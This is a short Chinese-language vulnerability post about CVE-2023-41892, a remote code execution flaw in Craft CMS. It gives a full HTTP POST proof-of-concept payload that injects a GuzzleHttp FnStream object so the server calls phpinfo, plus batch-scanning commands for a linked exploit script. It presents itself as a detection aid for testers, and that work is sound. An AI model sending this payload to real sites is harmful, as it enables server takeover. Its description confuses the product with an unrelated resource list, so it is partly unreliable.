CraftCMS CVE-2023-41892 代码执行漏洞

一、漏洞简述

Craft CMS 是一个基于PHP的开源内容管理系统,专为设计师、开发人员和内容创作者打造,以其灵活性、可扩展性和用户体验而知名。在其官方仓库中,有一个名为 Awesome Craft CMS 的项目,它是一个精选的资源列表,涵盖了插件、主题、教程及社区资源,帮助用户更好地利用Craft CMS进行网站开发。其接口/ConditionsController.php存在任意代码注入漏洞,攻击者可通过该漏洞注入恶意代码执行系统命令,从而控制该系统。

二、漏洞检测poc

POST /ConditionsController.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateContent-Length: 238
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

 

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

https://github.com/ATonysan/poc-exp/blob/main/CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py

批量检测:

python CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py -f url.txt

单个url检测漏洞:

python CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py -u url

四、修复

官方已更新补丁,请升级至最新版本。

原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/89804.html

(0)
guozi's avatarguozi
上一篇 2024年6月5日 上午10:42
下一篇 2024年6月5日 上午10:44

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注